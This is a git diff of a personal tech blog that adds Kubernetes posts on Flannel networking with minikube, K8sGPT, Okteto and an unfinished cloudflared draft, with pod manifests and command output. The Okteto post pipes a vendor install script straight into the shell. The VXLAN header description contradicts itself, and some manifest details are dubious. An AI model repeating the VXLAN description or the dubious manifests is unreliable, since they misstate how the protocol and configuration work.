+"source":"172.17.0.7:42246","method":"GET","headers":[["host","echo.info"],["x-request-id","6e0035387cfa6be8c53a3e03e73e9f23"],["x-real-ip","172.17.0.1"],["x-forwarded-for","172.17.0.1"],["x-forwarded-host","echo.info"],["x-forwarded-port","443"],["x-forwarded-proto","https"],["x-forwarded-scheme","https"],["x-scheme","https"],["user-agent","curl/7.79.1"],["accept","*/*"]],"path":"/test","server":"echo-6885c7cfdc-8phts"} +``` + +## source code + +{{< rawhtml >}} +
+
+{{< /rawhtml >}} + +Join [CloudNativeFolks Community](https://discord.gg/rEvr7vq) or Reach out to me on twitter [@sangamtwts](https://twitter.com/sangamtwts) diff --git a/content/en/blog/cloudflared/index 2.md b/content/en/blog/cloudflared/index 2.md new file mode 100644 index 0000000..11b6567 --- /dev/null +++ b/content/en/blog/cloudflared/index 2.md @@ -0,0 +1,28 @@ +--- +title : cloudflared tunnel on kubernetes +author : Sangam Biradar +categories : + - Kubernetes +weight : 10 +description : How to install cloudflared tunnel on kubernetes +draft : true +Date : 2023-02-17 +author : Sangam Biradar +--- + +## What is cloudflared tunnel? + +Cloudflare Tunnel is a reverse proxy that enables you to expose applications running on your local web server, on any network with an Internet connection, without adding DNS records or configuring a firewall or router. Cloudflare Tunnel establishes outbound connections to Cloudflare’s nearest data center and creates secure tunnels between the data center and a locally running web server. + +## How to install cloudflared tunnel on kubernetes? + +### Create a namespace + +```bash +kubectl create ns cloudflared +``` + +### Create a secret + +```bash + diff --git a/content/en/blog/flannel/VXLAN_Packet 2.png b/content/en/blog/flannel/VXLAN_Packet 2.png new file mode 100644 index 0000000..d816c10 Binary files /dev/null and b/content/en/blog/flannel/VXLAN_Packet 2.png differ diff --git a/content/en/blog/flannel/busybox1 2.yaml b/content/en/blog/flannel/busybox1 2.yaml new file mode 100644 index 0000000..42b8b71 --- /dev/null +++ b/content/en/blog/flannel/busybox1 2.yaml @@ -0,0 +1,11 @@ +apiVersion: v1 +kind: Pod +metadata: + name: busybox1 + labels: + tier: linux +spec: + containers: + - name: busybox1 + image: busybox + command: ['sh', '-c', ' sleep 3600'] diff --git a/content/en/blog/flannel/busybox2 2.yaml b/content/en/blog/flannel/busybox2 2.yaml new file mode 100644 index 0000000..ed83965 --- /dev/null +++ b/content/en/blog/flannel/busybox2 2.yaml @@ -0,0 +1,11 @@ +apiVersion: v1 +kind: Pod +metadata: + name: busybox2 + labels: + tier: linux +spec: + containers: + - name: busybox2 + image: busybox + command: ['sh', '-c', ' sleep 3600'] diff --git a/content/en/blog/flannel/busybox3 2.yaml b/content/en/blog/flannel/busybox3 2.yaml new file mode 100644 index 0000000..0cae656 --- /dev/null +++ b/content/en/blog/flannel/busybox3 2.yaml @@ -0,0 +1,12 @@ +apiVersion: v1 +kind: Pod +metadata: + name: busybox3 + labels: + tier: linux +spec: + nodeName: minikube + containers: + - name: busybox3 + image: busybox + command: ['sh', '-c', ' sleep 3600'] diff --git a/content/en/blog/flannel/flannel 2.png b/content/en/blog/flannel/flannel 2.png new file mode 100644 index 0000000..481fb61 Binary files /dev/null and b/content/en/blog/flannel/flannel 2.png differ diff --git a/content/en/blog/flannel/index 2.md b/content/en/blog/flannel/index 2.md new file mode 100644 index 0000000..d78442c --- /dev/null +++ b/content/en/blog/flannel/index 2.md @@ -0,0 +1,264 @@ +--- +title : Flannel is a network fabric for containers, designed for Kubernetes. +author : Sangam Biradar +categories : + - Kubernetes +weight : 10 +description : Flannel is a simple and easy way to configure a layer 3 network fabric designed for Kubernetes +draft : false +Date : 2023-02-17 +author : Sangam Biradar +--- + +{{< rawhtml >}} +
+
+{{< /rawhtml >}} + +### kubenetes networking + +![](./k8s-CNI-1.png) + + +### Networking details + +- Platforms like Kubernetes assume that each container (pod) has a unique, routable IP inside the cluster. The advantage of this model is that it removes the port mapping complexities that come from sharing a single host IP. + +- Flannel is responsible for providing a layer 3 IPv4 network between multiple nodes in a cluster. Flannel does not control how containers are networked to the host, only how the traffic is transported between hosts. However, flannel does provide a CNI plugin for Kubernetes and a guidance on integrating with Docker. Flannel is focused on networking + +- Flannel is a network overlay for Kubernetes. It provides a way for pods to communicate with each other even if they are not on the same host. Flannel is a simple and lightweight network overlay that is easy to install and configure. + +- Flannel works by creating a virtual network on top of the physical network. This virtual network is made up of tunnels that connect the pods. The tunnels are created using the VXLAN protocol. + +- When a pod sends a packet to another pod, the packet is encapsulated in a VXLAN header and sent to the tunnel that connects the two pods. The tunnel then decapsulates the packet and sends it to the destination pod. + +- Flannel is a layer 3 network, which means that it supports routing between pods. This is in contrast to some other network overlays, such as Docker Swarm, which are layer 2 networks. + +- Flannel does not control how containers are networked to the host. This is the responsibility of the host's operating system. Flannel only controls how traffic is transported between hosts. + +- Flannel provides a CNI plugin for Kubernetes. This plugin makes it easy to install and configure Flannel with Kubernetes. Flannel also provides guidance on integrating with Docker. + +#### Here are some of the benefits of using Flannel: + +- It is a simple and lightweight network overlay. +- It is easy to install and configure. +- It does not require any additional infrastructure. +- It is a good choice for small and medium-sized Kubernetes clusters. +- It supports routing between pods. +- It is compatible with Kubernetes and Docker. + +### Flannel Overlay Network + +To achieve kubernetes' network requirements, flannel’s idea is simple: create another flat network which runs above the host network, this is the so-called overlay network. All containers(Pod) will be assigned one ip address in this overlay network, they communicate with each other by calling each other’s ip address directly. + +![](./k8s-CNI-2.png) + + +### minikube start + +``` + ~ minikube start +πŸ˜„ minikube v1.30.1 on Darwin 13.3.1 (arm64) +✨ Using the docker driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... +πŸ”„ Restarting existing docker container for "minikube" ... +❗ Image was not built for the current minikube version. To resolve this you can delete and recreate your minikube cluster using the latest images. Expected minikube version: v1.29.0 -> Actual minikube version: v1.30.1 +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... +πŸ”— Configuring bridge CNI (Container Networking Interface) ... +πŸ”Ž Verifying Kubernetes components... + β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 +πŸ’‘ After the addon is enabled, please run "minikube tunnel" and your ingress resources would be available at "127.0.0.1" + β–ͺ Using image registry.k8s.io/ingress-nginx/controller:v1.7.0 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 +πŸ”Ž Verifying ingress addon... +🌟 Enabled addons: storage-provisioner, default-storageclass, ingress +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default +``` + +### Install Flannel on Minikube + +``` + ~ kubectl apply -f https://github.com/flannel-io/flannel/releases/latest/download/kube-flannel.yml +namespace/kube-flannel created +serviceaccount/flannel created +clusterrole.rbac.authorization.k8s.io/flannel created +clusterrolebinding.rbac.authorization.k8s.io/flannel created +configmap/kube-flannel-cfg created +daemonset.apps/kube-flannel-ds created +``` + +### Minikube provide option to select CNI Plugins +``` +--cni='': + CNI plug-in to use. Valid options: auto, bridge, calico, cilium, flannel, kindnet, or path + to a CNI manifest (default: auto) +``` +- while starting minikube define cni flag +``` + minikube start --cni=flannel +πŸ˜„ minikube v1.30.1 on Darwin 13.3.1 (arm64) +✨ Automatically selected the docker driver. Other choices: qemu2, virtualbox, ssh +πŸ“Œ Using Docker Desktop driver with root privileges +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... + > gcr.io/k8s-minikube/kicbase...: 336.39 MiB / 336.39 MiB 100.00% 4.83 Mi +πŸ”₯ Creating docker container (CPUs=4, Memory=8192MB) ... +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... + β–ͺ Generating certificates and keys ... + β–ͺ Booting up control plane ... + β–ͺ Configuring RBAC rules ... +πŸ”— Configuring Flannel (Container Networking Interface) ... + β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 +πŸ”Ž Verifying Kubernetes components... +🌟 Enabled addons: storage-provisioner, default-storageclass +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default +``` +### add another working node + +``` +➜ sangam14.github.io git:(main) βœ— minikube node add +πŸ˜„ Adding node m02 to cluster minikube +❗ Cluster was created without any CNI, adding a node to it might cause broken networking. +πŸ‘ Starting worker node minikube-m02 in cluster minikube +🚜 Pulling base image ... +πŸ”₯ Creating docker container (CPUs=4, Memory=8192MB) ... +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... +πŸ”Ž Verifying Kubernetes components... +πŸ„ Successfully added m02 to minikube! +``` +### Minikube Node list + +``` + ~ minikube node list +minikube 192.168.49.2 +minikube-m02 192.168.49.3 + +``` + +### Minikube create namespace kube-flannel + +``` +kubectl get pods -n kube-flannel +NAME READY STATUS RESTARTS AGE +kube-flannel-ds-48tbz 1/1 Running 0 21m +kube-flannel-ds-ltg88 1/1 Running 0 8m52s +``` + +#### create 2 busybox pod + +``` +kubectl create -f busybox1.yaml +kubectl create -f busybox2.yaml +``` +### get pods +``` +flannel git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +busybox1 1/1 Running 0 31s +busybox2 1/1 Running 0 45s +``` +### get more details around this pods +``` +kubectl get pods -o wide +``` +### The subnet of eth0 should match the CNI subnet +``` +flannel git:(main) βœ— kubectl exec --stdin --tty busybox1 -- ifconfig +eth0 Link encap:Ethernet HWaddr 52:3B:44:60:37:EB + inet addr:10.244.1.3 Bcast:10.244.1.255 Mask:255.255.255.0 + UP BROADCAST RUNNING MULTICAST MTU:65485 Metric:1 + RX packets:0 errors:0 dropped:0 overruns:0 frame:0 + TX packets:1 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:0 (0.0 B) TX bytes:42 (42.0 B) + +lo Link encap:Local Loopback + inet addr:127.0.0.1 Mask:255.0.0.0 + UP LOOPBACK RUNNING MTU:65536 Metric:1 + RX packets:0 errors:0 dropped:0 overruns:0 frame:0 + TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) + +➜ flannel git:(main) βœ— kubectl exec --stdin --tty busybox2 -- ifconfig +eth0 Link encap:Ethernet HWaddr 5E:FA:9B:2F:A1:69 + inet addr:10.244.1.2 Bcast:10.244.1.255 Mask:255.255.255.0 + UP BROADCAST RUNNING MULTICAST MTU:65485 Metric:1 + RX packets:0 errors:0 dropped:0 overruns:0 frame:0 + TX packets:1 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:0 (0.0 B) TX bytes:42 (42.0 B) + +lo Link encap:Local Loopback + inet addr:127.0.0.1 Mask:255.0.0.0 + UP LOOPBACK RUNNING MTU:65536 Metric:1 + RX packets:0 errors:0 dropped:0 overruns:0 frame:0 + TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) + +``` + +#### We should be able to ping between PoDs. + +``` + flannel git:(main) βœ— kubectl exec --stdin --tty busybox1 -- ping 10.244.1.2 +PING 10.244.1.2 (10.244.1.2): 56 data bytes +64 bytes from 10.244.1.2: seq=0 ttl=64 time=0.326 ms +64 bytes from 10.244.1.2: seq=1 ttl=64 time=0.086 ms +64 bytes from 10.244.1.2: seq=2 ttl=64 time=0.097 ms +64 bytes from 10.244.1.2: seq=3 ttl=64 time=0.106 ms +64 bytes from 10.244.1.2: seq=4 ttl=64 time=0.103 ms +64 bytes from 10.244.1.2: seq=5 ttl=64 time=0.071 ms +^C + +``` + +### PoDs in the host network of a node can communicate with all pods on all nodes without NAT + + +``` +➜ flannel git:(main) βœ— kubectl create -f busybox3.yaml +pod/busybox3 created +➜ flannel git:(main) βœ— kubectl get pods -o wide +NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES +busybox1 1/1 Running 5 (11m ago) 23h 10.244.1.3 minikube-m02 +busybox2 1/1 Running 5 (12m ago) 23h 10.244.1.2 minikube-m02 +busybox3 1/1 Running 0 20s 10.244.0.3 minikube +``` +Now starting a ping from this new PoD busybox 3 (in minikube node ) to busybox1 (in minikube-m02 ). + +``` + flannel git:(main) βœ— kubectl exec --stdin --tty busybox3 -- ping 10.244.1.3 +PING 10.244.1.3 (10.244.1.3): 56 data bytes +64 bytes from 10.244.1.3: seq=0 ttl=62 time=0.703 ms +64 bytes from 10.244.1.3: seq=1 ttl=62 time=0.198 ms +64 bytes from 10.244.1.3: seq=2 ttl=62 time=0.169 ms +64 bytes from 10.244.1.3: seq=3 ttl=62 time=0.159 ms +64 bytes from 10.244.1.3: seq=4 ttl=62 time=0.160 ms +64 bytes from 10.244.1.3: seq=5 ttl=62 time=0.125 ms +64 bytes from 10.244.1.3: seq=6 ttl=62 time=0.156 ms +64 bytes from 10.244.1.3: seq=7 ttl=62 time=0.179 ms +^C +``` +This works as expected. This is possible due to VxLAN implementation in flannel. +The VxLAN header is 8 bytes long and has the following format: + +24-bit VNID (Virtual Network Identifier): This field identifies the VxLAN network that the packet belongs to. +8-bit Flags: This field contains a few flags that control how the packet is processed. +24-bit Reserved: This field is reserved for future use. +20-byte Outer IP Header: This field contains the IP header of the encapsulated packet. +The VxLAN header is encapsulated in a UDP packet, which is then sent over the L3 routed infrastructure. The destination UDP port for VxLAN packets is 4789. + +When a VxLAN packet arrives at a VTEP, the VTEP decapsulates the packet and forwards the encapsulated packet to the destination host. + +VxLAN is a popular network virtualization technology that is used to create overlay networks over L3 routed infrastructures. VxLAN is a good choice for network virtualization because it is scalable, efficient, and easy to manage. + +![](./VXLAN_Packet.png) + + +Join [CloudNativeFolks Community](https://discord.gg/rEvr7vq) or Reach out to me on twitter [@sangamtwts](https://twitter.com/sangamtwts) + + diff --git a/content/en/blog/flannel/k8s-CNI-1 2.png b/content/en/blog/flannel/k8s-CNI-1 2.png new file mode 100644 index 0000000..4657a3c Binary files /dev/null and b/content/en/blog/flannel/k8s-CNI-1 2.png differ diff --git a/content/en/blog/flannel/k8s-CNI-2 2.png b/content/en/blog/flannel/k8s-CNI-2 2.png new file mode 100644 index 0000000..3454137 Binary files /dev/null and b/content/en/blog/flannel/k8s-CNI-2 2.png differ diff --git a/content/en/blog/k8sgpt/index 2.md b/content/en/blog/k8sgpt/index 2.md new file mode 100644 index 0000000..7de0ad5 --- /dev/null +++ b/content/en/blog/k8sgpt/index 2.md @@ -0,0 +1,214 @@ +--- +title : K8sgpt - Chatgpt base SRE +author : Sangam Biradar +categories : + - Kubernetes +weight : 30 +description : k8sgpt chat gpt for trubleshooting +draft : true +Date : 2023-02-15 +author : Sangam Biradar +--- + + +### Install k8sgpt ai + +``` + ~ brew tap k8sgpt-ai/k8sgpt +==> Tapping k8sgpt-ai/k8sgpt +Cloning into '/opt/homebrew/Library/Taps/k8sgpt-ai/homebrew-k8sgpt'... +remote: Enumerating objects: 86, done. +remote: Counting objects: 100% (86/86), done. +remote: Compressing objects: 100% (85/85), done. +remote: Total 86 (delta 51), reused 2 (delta 0), pack-reused 0 +Receiving objects: 100% (86/86), 18.77 KiB | 6.26 MiB/s, done. +Resolving deltas: 100% (51/51), done. +Tapped 1 formula (14 files, 37.8KB). +➜ ~ brew install k8sgpt +==> Fetching k8sgpt-ai/k8sgpt/k8sgpt +==> Downloading https://github.com/k8sgpt-ai/k8sgpt/releases/download/v0.3.0/k8sgpt_Darwin_arm64.tar.gz +==> Downloading from https://objects.githubusercontent.com/github-production-release-asset-2e65be/617152691/d9f59995-7f6 +################################################################################################################# 100.0% +==> Installing k8sgpt from k8sgpt-ai/k8sgpt +🍺 /opt/homebrew/Cellar/k8sgpt/0.3.0: 6 files, 55.5MB, built in 1 second +==> Running `brew cleanup k8sgpt`... + +``` + +### K8s filters list + +``` +k8sgpt filters list +Active: +> Pod +> PersistentVolumeClaim +> StatefulSet +> CronJob +> Deployment +> ReplicaSet +> Service +> Ingress +> Node +Unused: +> NetworkPolicy +> HorizontalPodAutoScaler +> PodDisruptionBudget + +``` + +### How K8sGPT works ? + +K8sGPT uses analyzers to triage and diagnose issues in your cluster. It has a set of analyzers that are built in, but you will be able to write your own analyzers. + +Built in analyzers + +Enabled by default + +- podAnalyzer + https://github.com/k8sgpt-ai/k8sgpt/blob/main/pkg/analyzer/pod.go + - search all namespaces for pods that are not running + - Check through container status to check for crashes or unready + - a container that is still being created or blocked due to conditions such as OOMKilled + - when pod is Running but its ReadinessProbe fails + +- pvcAnalyzer + - PersistentVolumeClaim.ObjectMeta + - Error: value.FailureDetails +- rsAnalyzer + - Status of replicaset + - type of event + - reason of failure + + ``` + Events: + Type Reason Age From Message + ---- ------ ---- ---- ------- + Normal SuccessfulCreate 117s replicaset-controller Created pod: frontend-wtsmm + Normal SuccessfulCreate 116s replicaset-controller Created pod: frontend-b2zdv + Normal SuccessfulCreate 116s replicaset-controller Created pod: frontend-vcmts + ``` +- serviceAnalyzer + - Service existed or not + - Service has not ready endpoints +- eventAnalyzer + - the function loops through the list of events to find the most recent one. It initializes a pointer to the latest event as nil, and then compares each event's LastTimestamp field to the current latest event's LastTimestamp. If the current event has a later LastTimestamp, the function updates the latestEvent pointer to point to that event instead. + + - Finally, the function returns a pointer to the latest event found, or an error if there was a problem fetching the events from the Kubernetes API. + + - Overall, this function is useful for retrieving the most recent event associated with a Kubernetes object, which can be helpful in monitoring and troubleshooting the state of Kubernetes resources. + +- ingressAnalyzer + - checks if the Ingress is using TLS encryption and extracts the list of hostnames associated with the Ingress. + - implementation is specifically responsible for extracting and organizing relevant information from Kubernetes Ingress resources to generate descriptions about them. +- statefulSetAnalyzer + - check StatefulSet uses the service namespace and servicename which does not exist + - The volumeClaimTemplates will provide stable storage using PersistentVolumes provisioned by a PersistentVolume Provisioner. + +- deploymentAnalyzer + - DeploymentAnalyzer is an analyzer that checks for misconfigured Deployments from all namespaces +- cronJobAnalyzer + - Check CRON schedule format +- networkPolicyAnalyzer + - Check if policy allows traffic to all pods in the namespace + - Check if policy is not applied to any pods +- nodeAnalyzer + +> Conditions + +The conditions field describes the status of all Running nodes. Examples of conditions include: + +| Node Condition | Description | +| ---------------|-------------- | +| Ready | True if the node is healthy and ready to accept pods, False if the node is not healthy and is not accepting pods, and Unknown if the node controller has not heard from the node in the last node-monitor-grace-period (default is 40 seconds) | +| DiskPressure | True if pressure exists on the disk sizeβ€”that is, if the disk capacity is low; otherwise False | +| MemoryPressure | True if pressure exists on the node memoryβ€”that is, if the node memory is low; otherwise False | +| PIDPressure | True if pressure exists on the processesβ€”that is, if there are too many processes on the node; otherwise False | +NetworkUnavailable | True if the network for the node is not correctly configured, otherwise False | + + + + - In the Kubernetes API, a node's condition is represented as part of the .status of the Node resource. For example, the following JSON structure describes a healthy node: + +``` + "conditions": [ + { + "type": "Ready", + "status": "True", + "reason": "KubeletReady", + "message": "kubelet is posting ready status", + "lastHeartbeatTime": "2023-06-05T18:38:35Z", + "lastTransitionTime": "2023-06-05T11:41:27Z" + } +] + +``` + + +### start minikube + +``` +➜ ~ minikube start +πŸ˜„ minikube v1.30.0 on Darwin 13.3.1 (arm64) +πŸŽ‰ minikube 1.30.1 is available! Download it: https://github.com/kubernetes/minikube/releases/tag/v1.30.1 +πŸ’‘ To disable this notice, run: 'minikube config set WantUpdateNotification false' + +✨ Using the docker driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... +πŸ”„ Restarting existing docker container for "minikube" ... +❗ Image was not built for the current minikube version. To resolve this you can delete and recreate your minikube cluster using the latest images. Expected minikube version: v1.29.0 -> Actual minikube version: v1.30.0 +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... +πŸ”— Configuring bridge CNI (Container Networking Interface) ... +πŸ”Ž Verifying Kubernetes components... +πŸ’‘ After the addon is enabled, please run "minikube tunnel" and your ingress resources would be available at "127.0.0.1" + β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 + β–ͺ Using image registry.k8s.io/ingress-nginx/controller:v1.7.0 +πŸ”Ž Verifying ingress addon... +🌟 Enabled addons: storage-provisioner, default-storageclass, ingress +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default +➜ ~ + +``` + +### deploy simple guestbook app + +``` +➜ kubectl run nginx --image=nginx:5.0.0 --restart=Never + +pod/nginx created + + +``` + +``` +~ k8sgpt analyze +Service kube-system/k8s.io-minikube-hostpath does not exist + +0 default/nginx(nginx) +- Error: Back-off pulling image "nginx:5.0.0" + +``` + + +K8sGPT is a tool for scanning your Kubernetes clusters, diagnosing and triaging issues in simple English. It has SRE experience codified into it's analyzers and helps to pull out the most relevant information to enrich it with AI. + +> Here are some of the features of K8sGPT: + +- Scans your Kubernetes clusters for common problems and issues. +Diagnoses and triages issues in simple English. +- Helps to pull out the most relevant information to enrich it with AI. +Is constantly being updated to keep up with the latest Kubernetes releases. +K8sGPT is a valuable tool for any Kubernetes administrator or developer. It can help you to identify and resolve issues quickly and easily, and it can help you to improve the performance and reliability of your Kubernetes clusters. + +> Here are some of the benefits of using K8sGPT: + +- Increased uptime and reliability: K8sGPT can help you to identify and resolve issues quickly and easily, which can help to increase the uptime and reliability of your Kubernetes clusters. +- Improved performance: K8sGPT can help you to identify and optimize performance bottlenecks, which can help to improve the performance of your Kubernetes clusters. +Reduced costs: K8sGPT can help you to reduce the cost of operating your Kubernetes clusters by identifying and eliminating unnecessary resources. +- If you are a Kubernetes administrator or developer, I encourage you to try K8sGPT. It is a valuable tool that can help you to improve the performance, reliability, and security of your Kubernetes clusters. + + + + diff --git a/content/en/blog/okteto/2048-k8s 2.png b/content/en/blog/okteto/2048-k8s 2.png new file mode 100644 index 0000000..22a7144 Binary files /dev/null and b/content/en/blog/okteto/2048-k8s 2.png differ diff --git a/content/en/blog/okteto/index 2.md b/content/en/blog/okteto/index 2.md new file mode 100644 index 0000000..298a4da --- /dev/null +++ b/content/en/blog/okteto/index 2.md @@ -0,0 +1,425 @@ +--- +title : Okteto Develop your applications directly in your Kubernetes Cluster +author : Sangam Biradar +categories : + - Kubernetes +weight : 50 +description : Reduce Inner Loop focus on Developing Application +draft : false +Date : 2023-02-18 +author : Sangam Biradar +--- + + +{{< rawhtml >}} +
+{{< /rawhtml >}} + +### Getting started with Oketo CLI + +- Macos/Linux + +```bash + +➜ curl https://get.okteto.com -sSfL | sh +> Using Release Channel: stable +> Using Version: 2.14.0 +> Downloading https://downloads.okteto.com/cli/stable/2.14.0/okteto-Darwin-arm64 + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed +100 74.8M 100 74.8M 0 0 20.0M 0 0:00:03 0:00:03 --:--:-- 20.0M + +``` + +### Login into Okteto Cloud via Github Account + +![](./okteto-login.png) + + +### Configuring Okteto CLI with Okteto Cloud + +```bash + +➜ okteto context +A context defines the default cluster/namespace for any Okteto CLI command. +Select the context you want to use: +Use the arrow keys to navigate: ↓ ↑ β†’ ← + β–Έ https://cloud.okteto.com (Okteto Cloud) * + docker-desktop + minikube + multinode-pod-security + + Create new context +``` +Or use directly + +```bash +➜ okteto context use https://cloud.okteto.com + βœ“ Using sangam14 @ cloud.okteto.com +``` + +2048 folder contain source code for 2048 + +```Dockerfile +FROM nginx + +COPY 2048 /usr/share/nginx/html + +EXPOSE 80 + +CMD ["nginx", "-g", "daemon off;"] +``` + +```Docker-Compose.yml +services: + game: + build: ./ + expose: + - 8080:80 +``` +### Deploy Docker Compose on Okteto Cloud + +okteto use [compose-spec](https://github.com/compose-spec/compose-spec) also its convert docker compose to kubernetes Manifest + +here is more about docker compose on okteto (https://www.okteto.com/docs/reference/compose/) + +```bash +okteto deploy --build + i Using sangam14 @ cloud.okteto.com as context + i Building 'Dockerfile' in tcp://buildkit.cloud.okteto.net:443... +[+] Building 7.8s (7/7) FINISHED + => [internal] load build definition from buildkit-3366967893 0.9s + => => transferring dockerfile: 137B 0.8s + => [internal] load .dockerignore 0.7s + => => transferring context: 2B 0.6s + => [internal] load metadata for docker.io/library/nginx:latest 1.1s + => [internal] load build context 2.5s + => => transferring context: 603.29kB 2.5s + => CACHED [1/2] FROM docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19 0.0s + => => resolve docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19c0 0.0s + => [2/2] COPY 2048 /usr/share/nginx/html 0.3s + => exporting to image 2.5s + => => exporting layers 0.1s + => => exporting manifest sha256:79f1385595d70b82b4b5db52f5edddb1f4a06c79ded928926d48bb947a5322b6 0.0s + => => exporting config sha256:ecf1dac7fbfaa6cdcb88dd2bbc616edbbc96459b078f15199fe3ddd564c481de 0.0s + => => pushing layers 1.6s + => => pushing manifest for registry.cloud.okteto.net/sangam14/okteto-2048-game:okteto@sha256:79f1385595d70b82b4b5d 0.8s + βœ“ Image 'registry.cloud.okteto.net/sangam14/okteto-2048-game:okteto' successfully pushed + βœ“ Kubernetes service 'game' created + βœ“ Endpoint 'game' created + βœ“ Service 'game' created + βœ“ Compose 'Okteto-2048' successfully deployed + βœ“ Development environment 'Okteto-2048' successfully deployed + i Run 'okteto up' to activate your development container + +``` + +### Check it out Okteto Cloud + +Okteto basically use technic all + +![](./okteto-UI.png) + + +### Check it out enpoints + +you will see application running + +![](./okteto-2048-game.png) + +### lets same app using kubernetes + +okteto also provide capablities to build docker images remotely its means without installing docker you can now build docker images . + +```bash + +➜ okteto build -t sangam14/okteto-2048-game:okteto . + i Building 'Dockerfile' in tcp://buildkit.cloud.okteto.net:443... +[+] Building 5.9s (8/8) FINISHED + => [internal] load build definition from buildkit-3724659360 1.5s + => => transferring dockerfile: 180B 1.5s + => [internal] load .dockerignore 0.9s + => => transferring context: 2B 0.8s + => [internal] load metadata for docker.io/library/nginx:latest 0.9s + => CACHED [1/3] FROM docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19 0.0s + => => resolve docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19c0 0.0s + => [internal] load build context 0.9s + => => transferring context: 4.66kB 0.5s + => [2/3] RUN chmod +x /usr/sbin/nginx 0.9s + => [3/3] COPY 2048 /usr/share/nginx/html 0.3s + => exporting to image 2.1s + => => exporting layers 0.3s + => => exporting manifest sha256:ad9bdd97413eddbcd25fe2d1c55992796848a314e33165235a307726dcadaf8a 0.0s + => => exporting config sha256:2f2ffc174a087bf9653029ec247279885a59e77887a259e592761ed4b06a3959 0.0s + => => pushing layers 1.5s + => => pushing manifest for docker.io/sangam14/okteto-2048-game:okteto@sha256:ad9bdd97413eddbcd25fe2d1c55992796848a 0.3s + βœ“ Image 'sangam14/okteto-2048-game:okteto' successfully pushed + +``` + +### Okteto Support Kubernetes , Kustomize also Helm charts + +```yaml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: nginx-deployment +spec: + selector: + matchLabels: + app: nginx + replicas: 2 + template: + metadata: + labels: + app: nginx + spec: + containers: + - name: nginx + image: docker.io/sangam14/okteto-2048-game:okteto + ports: + - containerPort: 80 +--- +apiVersion: v1 +kind: Service +metadata: + name: nginx-service + labels: + app: nginx +spec: + type: NodePort + ports: + - port: 8080 + targetPort: 80 + nodePort: 8080 + protocol: TCP + selector: + app: nginx + + +``` + +### Deploy Ngnix 2048 game app + +```bash +➜ Okteto-2048 git:(main) βœ— kubectl apply -f 2048.yaml +deployment.apps/nginx-deployment unchanged +service/nginx-service configured +➜ Okteto-2048 git:(main) βœ— kubectl apply -f 2048.yaml +deployment.apps/nginx-deployment configured +service/nginx-service configured +``` + +### check it out endpoint + +https://nginx-service-sangam14.cloud.okteto.net + +![](./2048-k8s.png) + + +### Automate Inner loops +okteto manefist allow developer to execute as workflow as well as its +``` +build: + nginx-deployment: + image: docker.io/sangam14/okteto-2048-game:okteto + context: . +deploy: +- kubectl apply -f 2048.yaml +``` + +// active developement mode on container +``` +dev: + nginx-deployment: + command: bash + sync: + - 2048/:/usr/share/nginx/html + interface: 0.0.0.0 + forward: + - 80:80 + +``` + +### Build and Deploy Okteto App + +``` +➜ Okteto-2048 git:(main) βœ— okteto deploy --build + i Using sangam14 @ cloud.okteto.com as context + i Building 'Dockerfile' in tcp://buildkit.cloud.okteto.net:443... +[+] Building 8.0s (8/8) FINISHED + => [internal] load .dockerignore 0.6s + => => transferring context: 2B 0.5s + => [internal] load build definition from buildkit-576543900 0.9s + => => transferring dockerfile: 179B 0.8s + => [internal] load metadata for docker.io/library/nginx:latest 1.8s + => [1/3] FROM docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19c0 0.0s + => => resolve docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19c0 0.0s + => [internal] load build context 2.5s + => => transferring context: 604.24kB 2.4s + => CACHED [2/3] RUN chmod +x /usr/sbin/nginx 0.0s + => [3/3] COPY 2048 /usr/share/nginx/html 0.2s + => exporting to image 2.2s + => => exporting layers 0.1s + => => exporting manifest sha256:e7348f570cd90c473ff5e0707836843c092fb458809d211b8903ac2313725399 0.0s + => => exporting config sha256:67e7d8f2c044e9aa85651fdff97f15477cf7f32372315f94ef6c1d498f408fbf 0.0s + => => pushing layers 1.9s + => => pushing manifest for 